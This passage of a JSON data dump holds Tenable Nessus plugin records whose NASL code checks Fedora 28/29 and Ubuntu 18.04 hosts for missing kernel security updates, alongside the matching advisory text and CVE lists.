Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-01T00:00:00", "title": "Fedora 29 : kernel / kernel-headers (2019-7462acf8ba)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8980", "CVE-2019-9162"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:kernel-headers"], "id": 
"FEDORA_2019-7462ACF8BA.NASL", "href": "https://www.tenable.com/plugins/nessus/122521", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-7462acf8ba.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122521);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2020/02/07\");\n\n script_cve_id(\"CVE-2019-8980\", \"CVE-2019-9162\");\n script_xref(name:\"FEDORA\", value:\"2019-7462acf8ba\");\n\n script_name(english:\"Fedora 29 : kernel / kernel-headers (2019-7462acf8ba)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.20.12 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-7462acf8ba\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel and / or kernel-headers packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9162\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2019-8980\", \"CVE-2019-9162\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2019-7462acf8ba\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"kernel-4.20.12-200.fc29\")) flag++;\nif (rpm_check(release:\"FC29\", reference:\"kernel-headers-4.20.12-200.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-headers\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-01T02:33:24", "description": "The 4.20.14 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.20.13 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.20.12 stable kernel update contains a number of important fixes\nacross the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-12T00:00:00", 
"title": "Fedora 28 : kernel / kernel-headers (2019-196ab64d65)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8980", "CVE-2019-9162", "CVE-2019-9213"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "p-cpe:/a:fedoraproject:fedora:kernel-headers", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2019-196AB64D65.NASL", "href": "https://www.tenable.com/plugins/nessus/122769", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-196ab64d65.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122769);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/02/05\");\n\n script_cve_id(\"CVE-2019-8980\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n script_xref(name:\"FEDORA\", value:\"2019-196ab64d65\");\n\n script_name(english:\"Fedora 28 : kernel / kernel-headers (2019-196ab64d65)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.20.14 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.20.13 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.20.12 stable kernel update contains a number of important fixes\nacross the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-196ab64d65\"\n );\n script_set_attribute(\n attribute:\"solution\", \n 
value:\"Update the affected kernel and / or kernel-headers packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9162\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2019-8980\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2019-196ab64d65\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"kernel-4.20.14-100.fc28\")) flag++;\nif (rpm_check(release:\"FC28\", reference:\"kernel-headers-4.20.14-100.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel 
/ kernel-headers\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-01T07:34:40", "description": "USN-3930-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.10.\nThis update provides the corresponding updates for the Linux Hardware\nEnablement (HWE) kernel from Ubuntu 18.10 for Ubuntu 18.04 LTS.\n\nMathias Payer and Hui Peng discovered a use-after-free vulnerability\nin the Advanced Linux Sound Architecture (ALSA) subsystem. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an\ninformation leak in the Bluetooth implementation of the Linux kernel.\nAn attacker within Bluetooth range could use this to expose sensitive\ninformation (kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel\ncontained a use-after-free vulnerability. An attacker in a guest VM\nwith access to /dev/kvm could use this to cause a denial of service\n(guest VM crash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free\nvulnerability in the KVM subsystem of the Linux kernel, when using\nnested virtual machines. A local attacker in a guest VM could use this\nto cause a denial of service (system crash) or possibly execute\narbitrary code in the host system. (CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability\nexisted in the KVM subsystem of the Linux kernel, when nested\nvirtualization is used. A local attacker could use this to expose\nsensitive information (host system memory to a guest VM).\n(CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel\nwas insufficiently hardened against Spectre V1 attacks. 
A local\nattacker could use this to expose sensitive information.\n(CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the\nuser- space API for crypto (af_alg) implementation in the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate\nmemory when handling certain errors while reading files. A local\nattacker could use this to cause a denial of service (excessive memory\nconsumption). (CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIPMI implementation in the Linux kernel. A local attacker with access\nto the IPMI character device files could use this to cause a denial of\nservice (system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux\nkernel performed insufficient ASN.1 length checks. An attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-9162)\n\nJann Horn discovered that the mmap implementation in the Linux kernel\ndid not properly check for the mmap minimum address in some\nsituations. A local attacker could use this to assist exploiting a\nkernel NULL pointer dereference vulnerability. (CVE-2019-9213).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-03T00:00:00", "title": "Ubuntu 18.04 LTS : linux-hwe, linux-azure vulnerabilities (USN-3930-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-9003", "CVE-2019-8980", "CVE-2019-8912", "CVE-2019-9162", "CVE-2019-8956", "CVE-2019-7221", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2019-7308"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-18.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic"], "id": "UBUNTU_USN-3930-2.NASL", "href": "https://www.tenable.com/plugins/nessus/123677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3930-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123677);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/27\");\n\n script_cve_id(\"CVE-2018-19824\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-6974\", \"CVE-2019-7221\", \"CVE-2019-7222\", \"CVE-2019-7308\", \"CVE-2019-8912\", \"CVE-2019-8956\", \"CVE-2019-8980\", \"CVE-2019-9003\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n script_xref(name:\"USN\", value:\"3930-2\");\n\n script_name(english:\"Ubuntu 18.04 LTS : linux-hwe, linux-azure vulnerabilities (USN-3930-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3930-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.10.\nThis update provides the corresponding updates for the Linux Hardware\nEnablement (HWE) kernel from Ubuntu 18.10 for Ubuntu 18.04 LTS.\n\nMathias Payer and Hui Peng discovered a use-after-free vulnerability\nin the Advanced Linux Sound Architecture (ALSA) subsystem. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an\ninformation leak in the Bluetooth implementation of the Linux kernel.\nAn attacker within Bluetooth range could use this to expose sensitive\ninformation (kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel\ncontained a use-after-free vulnerability. An attacker in a guest VM\nwith access to /dev/kvm could use this to cause a denial of service\n(guest VM crash). 
(CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free\nvulnerability in the KVM subsystem of the Linux kernel, when using\nnested virtual machines. A local attacker in a guest VM could use this\nto cause a denial of service (system crash) or possibly execute\narbitrary code in the host system. (CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability\nexisted in the KVM subsystem of the Linux kernel, when nested\nvirtualization is used. A local attacker could use this to expose\nsensitive information (host system memory to a guest VM).\n(CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel\nwas insufficiently hardened against Spectre V1 attacks. A local\nattacker could use this to expose sensitive information.\n(CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the\nuser- space API for crypto (af_alg) implementation in the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate\nmemory when handling certain errors while reading files. A local\nattacker could use this to cause a denial of service (excessive memory\nconsumption). (CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIPMI implementation in the Linux kernel. A local attacker with access\nto the IPMI character device files could use this to cause a denial of\nservice (system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux\nkernel performed insufficient ASN.1 length checks. 
An attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-9162)\n\nJann Horn discovered that the mmap implementation in the Linux kernel\ndid not properly check for the mmap minimum address in some\nsituations. A local attacker could use this to assist exploiting a\nkernel NULL pointer dereference vulnerability. (CVE-2019-9213).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3930-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8956\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2020 Canonical, Inc. / NASL script (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-19824\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-6974\", \"CVE-2019-7221\", \"CVE-2019-7222\", \"CVE-2019-7308\", \"CVE-2019-8912\", \"CVE-2019-8956\", \"CVE-2019-8980\", \"CVE-2019-9003\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3930-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.18.0-1014-azure\", pkgver:\"4.18.0-1014.14~18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.18.0-17-generic\", pkgver:\"4.18.0-17.18~18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.18.0-17-generic-lpae\", pkgver:\"4.18.0-17.18~18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.18.0-17-lowlatency\", 
pkgver:\"4.18.0-17.18~18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.18.0-17-snapdragon\", pkgver:\"4.18.0-17.18~18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-azure\", pkgver:\"4.18.0.1014.13\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic-hwe-18.04\", pkgver:\"4.18.0.17.67\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic-lpae-hwe-18.04\", pkgver:\"4.18.0.17.67\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-lowlatency-hwe-18.04\", pkgver:\"4.18.0.17.67\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-snapdragon-hwe-18.04\", pkgver:\"4.18.0.17.67\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-virtual-hwe-18.04\", pkgver:\"4.18.0.17.67\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.18-azure / linux-image-4.18-generic / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T07:34:40", "description": "Mathias Payer and Hui Peng discovered a use-after-free vulnerability\nin the Advanced Linux Sound Architecture (ALSA) subsystem. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an\ninformation leak in the Bluetooth implementation of the Linux kernel.\nAn attacker within Bluetooth range could use this to expose sensitive\ninformation (kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel\ncontained a use-after-free vulnerability. 
An attacker in a guest VM\nwith access to /dev/kvm could use this to cause a denial of service\n(guest VM crash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free\nvulnerability in the KVM subsystem of the Linux kernel, when using\nnested virtual machines. A local attacker in a guest VM could use this\nto cause a denial of service (system crash) or possibly execute\narbitrary code in the host system. (CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability\nexisted in the KVM subsystem of the Linux kernel, when nested\nvirtualization is used. A local attacker could use this to expose\nsensitive information (host system memory to a guest VM).\n(CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel\nwas insufficiently hardened against Spectre V1 attacks. A local\nattacker could use this to expose sensitive information.\n(CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the\nuser- space API for crypto (af_alg) implementation in the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a 